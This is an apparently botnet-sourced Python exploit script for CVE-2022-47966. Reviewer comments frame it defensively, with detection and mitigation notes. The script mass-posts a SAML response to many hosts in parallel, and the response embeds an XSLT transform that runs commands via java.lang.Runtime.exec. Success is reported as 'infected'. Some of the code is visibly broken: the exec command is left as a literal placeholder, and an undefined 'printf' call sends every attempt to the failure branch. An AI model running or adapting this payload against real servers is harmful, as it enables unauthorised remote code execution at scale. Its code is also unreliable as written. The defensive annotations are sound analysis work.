Path: blob/master/Botnets/Exploits/CVE-2022-47966.py
# Reviewer summary (defensive reading of this listing)
#
# What it does: reads a host list from the file named on the command line
# and, one thread per host, POSTs a single fixed SAMLResponse form field to
# https://<host>:8080/SamlResponseServlet.
#
# Why it matters: the file path ties the script to CVE-2022-47966. The XML
# signature in the template below carries an XSLT <ds:Transform> that declares
# Xalan Java extension namespaces (java.lang.Runtime, java.lang.Object). The
# exposure is on servers that evaluate Reference transforms before the
# signature has been validated.
#
# Detection: every request this script sends contains the same literal ID,
# InResponseTo, IssueInstant, DigestValue and SignatureValue, so those strings
# can be matched after base64-decoding the SAMLResponse parameter. An XSLT
# transform (REC-xslt-19991116) with xalan/java namespaces inside a SAML
# signature is worth alerting on in its own right -- presumably no legitimate
# IdP emits one; confirm against your own IdP traffic.
#
# Mitigation: install the vendor fix for the CVE, and make sure XML-signature
# processing rejects XSLT transforms (secure validation) before any SAML
# response is parsed.
#
# NOTE(review): the listing lost its indentation; the block nesting below is
# reconstructed from the statement order and should be checked against the
# original file.
import sys
import threading  # not referenced in the visible code
import requests
import os
import socket  # not referenced in the visible code
import time
from queue import *
from threading import Thread
import base64
import urllib.parse  # not referenced in the visible code

# Requires exactly one argument: the path of a text file with one host per line.
if len(sys.argv) < 2:
    sys.exit("\033[37mUsage: python "+sys.argv[0]+" <ip list>")

# The whole host list is read into memory; the read handle is never closed.
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
queue_count = 0
# Module-level value handed to str.format() on the template below; it is the
# empty string here.
command = ''

# Second handle on the same file, opened for appending. Nothing in the visible
# code writes to it or closes it.
info = open(str(sys.argv[1]),'a+')
# Static SAML response template. It is formatted once, at import time, so the
# identifiers, timestamps, digest and signature value are identical in every
# request the script makes (see the detection note in the header).
saml = """<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response
ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf"
InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff"
IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600"
IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
<Issuer>{}</Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
<xsl:stylesheet version="1.0"
xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,'{{command}}')"/>
<xsl:variable name="processString" select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>
</ds:Transform>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue>
<ds:KeyInfo/>
</ds:Signature>
</Assertion>
</samlp:Response>
""".format(command)

# Form body shared by all requests: the template above, base64-encoded, under
# the SAMLResponse key.
d = {'SAMLResponse': base64.b64encode(saml.encode())}

def test(ip):
    """Send the shared SAMLResponse form to one host.

    Args:
        ip: one line of the host list; a trailing newline is stripped.

    The response object is discarded, so the messages printed here say
    nothing about the host's patch state. Server-side request logs are the
    only reliable record of what was received.
    """
    ip = str(ip).rstrip("\n")
    try:
        # verify=False turns off TLS certificate validation; no timeout is
        # passed, so a silent host can hold its thread open.
        requests.post("https://"+ip+":8080/SamlResponseServlet", data=d, verify=False)
        printf("[+] infected");
    except Exception:
        # Any exception raised in the try block lands here, not only
        # connection errors.
        print("[-] " + ip + " is not vulnerable!")
        pass


def main():
    """Queue every host from the list, then start one thread per queued host.

    Threads are started 0.05 s apart with no upper bound on how many run at
    once. From the defender's side this shows up as a burst of POSTs to the
    same path across many hosts from one source address.
    """
    global queue_count
    print(command);
    for line in ips:
        # Strip line endings and count the entry before queueing it.
        line = line.strip("\r")
        line = line.strip("\n")
        queue_count += 1
        sys.stdout.flush()
        queue.put(line)
    sys.stdout.write("\n")
    i = 0
    while i != queue_count:
        i += 1
        try:
            # `input` shadows the builtin of the same name inside this loop.
            input = queue.get()
            thread = Thread(target=test, args=(input,))
            thread.start()
            time.sleep(0.05)
        except KeyboardInterrupt:
            # Ctrl-C kills the whole process with signal 9 (no cleanup).
            os.kill(os.getpid(), 9)
    # Only the most recently started thread is joined here.
    thread.join()
    return


if __name__ == "__main__":
    main()